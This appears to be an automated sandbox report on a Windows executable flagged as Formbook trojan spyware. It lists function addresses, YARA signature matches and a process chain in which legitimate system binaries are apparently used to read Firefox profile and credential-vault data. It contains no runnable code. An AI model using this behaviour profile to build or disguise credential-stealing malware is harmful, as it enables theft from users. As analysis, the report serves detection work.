Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D34C 4_2_0587D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058952A0 4_2_058952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AB2C0 4_2_058AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059312ED 4_2_059312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05930274 4_2_05930274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A8DBF 4_2_058A8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AFDC0 4_2_058AFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588ADE0 4_2_0588ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589AD00 4_2_0589AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05893D40 4_2_05893D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05941D5A 4_2_05941D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05947D73 4_2_05947D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05930CB5 4_2_05930CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FCF2 4_2_0594FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880CF2 4_2_05880CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890C00 4_2_05890C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05909C32 4_2_05909C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891F92 4_2_05891F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FFB1 4_2_0594FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882FC8 4_2_05882FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589CFE0 4_2_0589CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FF09 4_2_0594FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D2F28 4_2_058D2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B0F30 4_2_058B0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05904F40 4_2_05904F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594CE93 4_2_0594CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A2E90 4_2_058A2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05899EB0 4_2_05899EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594EEDB 4_2_0594EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594EE26 4_2_0594EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890E59 4_2_05890E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058929A0 4_2_058929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595A9A6 4_2_0595A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05899950 4_2_05899950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AB950 4_2_058AB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A6962 4_2_058A6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058768B8 4_2_058768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058938E0 4_2_058938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE8F0 4_2_058BE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD800 4_2_058FD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05892840 4_2_05892840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589A840 4_2_0589A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AFB80 4_2_058AFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05946BD7 4_2_05946BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058CDBF9 4_2_058CDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594AB40 4_2_0594AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FB76 4_2_0594FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588EA80 4_2_0588EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D5AA0 4_2_058D5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592DAAC 4_2_0592DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593DAC6 4_2_0593DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05947A46 4_2_05947A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FA49 4_2_0594FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05903A6C 4_2_05903A6C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374A352 7_2_0374A352
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0367D34C 7_2_0367D34C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374132D 7_2_0374132D
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037503E6 7_2_037503E6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369E3F0 7_2_0369E3F0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036D739A 7_2_036D739A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03730274 7_2_03730274
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037312ED 7_2_037312ED
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AB2C0 7_2_036AB2C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036952A0 7_2_036952A0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C516C 7_2_036C516C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0367F172 7_2_0367F172
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0375B16B 7_2_0375B16B
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03680100 7_2_03680100
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0372A118 7_2_0372A118
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037481CC 7_2_037481CC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369B1B0 7_2_0369B1B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037501AA 7_2_037501AA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374F0E0 7_2_0374F0E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037470E9 7_2_037470E9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036970C0 7_2_036970C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0373F0CC 7_2_0373F0CC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690770 7_2_03690770
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036B4750 7_2_036B4750
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0368C7C0 7_2_0368C7C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374F7B0 7_2_0374F7B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AC6E0 7_2_036AC6E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037416CC 7_2_037416CC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03747571 7_2_03747571
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690535 7_2_03690535
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0372D5B0 7_2_0372D5B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03750591 7_2_03750591
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03681460 7_2_03681460
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03742446 7_2_03742446
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374F43F 7_2_0374F43F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0373E4F6 7_2_0373E4F6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FB76 7_2_0374FB76
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374AB40 7_2_0374AB40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036CDBF9 7_2_036CDBF9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03746BD7 7_2_03746BD7
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AFB80 7_2_036AFB80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03703A6C 7_2_03703A6C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03747A46 7_2_03747A46
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FA49 7_2_0374FA49
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0373DAC6 7_2_0373DAC6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036D5AA0 7_2_036D5AA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0372DAAC 7_2_0372DAAC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0368EA80 7_2_0368EA80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036A6962 7_2_036A6962
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03699950 7_2_03699950
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AB950 7_2_036AB950
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036929A0 7_2_036929A0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0375A9A6 7_2_0375A9A6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03692840 7_2_03692840
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369A840 7_2_0369A840
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036938E0 7_2_036938E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036BE8F0 7_2_036BE8F0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036768B8 7_2_036768B8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03704F40 7_2_03704F40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036B0F30 7_2_036B0F30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FF09 7_2_0374FF09
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369CFE0 7_2_0369CFE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03682FC8 7_2_03682FC8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FFB1 7_2_0374FFB1
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03691F92 7_2_03691F92
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690E59 7_2_03690E59
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374EE26 7_2_0374EE26
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374EEDB 7_2_0374EEDB
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03699EB0 7_2_03699EB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374CE93 7_2_0374CE93
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036A2E90 7_2_036A2E90
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03747D73 7_2_03747D73
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03693D40 7_2_03693D40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03741D5A 7_2_03741D5A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369AD00 7_2_0369AD00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0368ADE0 7_2_0368ADE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AFDC0 7_2_036AFDC0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036A8DBF 7_2_036A8DBF
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03709C32 7_2_03709C32
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690C00 7_2_03690C00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FCF2 7_2_0374FCF2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03680CF2 7_2_03680CF2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03730CB5 7_2_03730CB5
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E51A60 7_2_02E51A60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E413A1 7_2_02E413A1
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E6A4C0 7_2_02E6A4C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E53580 7_2_02E53580
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4CEC0 7_2_02E4CEC0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4AF40 7_2_02E4AF40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4CCA0 7_2_02E4CCA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4CC97 7_2_02E4CC97
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349A39A 7_2_0349A39A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349C06C 7_2_0349C06C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349B0D8 7_2_0349B0D8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349BBB4 7_2_0349BBB4
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349BCD3 7_2_0349BCD3
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: String function: 00007FF65855D7A0 appears 64 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036C5130 appears 36 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 0367B970 appears 266 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036FEA12 appears 84 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 0370F290 appears 105 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036D7E54 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 0587B970 appears 268 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058D7E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058C5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 0590F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058FEA12 appears 85 times
Sample file is different than original file name gathered from version info
Source: GJRX21GBj3.exe Binary or memory string: OriginalFilename vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe, 00000000.00000000.2067604251.00007FF658727000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe, 00000000.00000002.2078597874.0000029B99C00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Yara signature match
Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: GJRX21GBj3.exe Static PE information: Section: .rsrc ZLIB complexity 0.9966439773787313
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/1@12/8
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658562B30 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 0_2_00007FF658562B30
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Temp\H0840I45 Jump to behavior
Source: GJRX21GBj3.exe Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: findstr.exe, 00000007.00000002.3924355546.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520892415.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3924355546.000000000329A000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2520776219.0000000003279000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: GJRX21GBj3.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\GJRX21GBj3.exe File read: C:\Users\user\Desktop\GJRX21GBj3.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\GJRX21GBj3.exe "C:\Users\user\Desktop\GJRX21GBj3.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" Jump to behavior
Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptbase.dll Jump to behavior
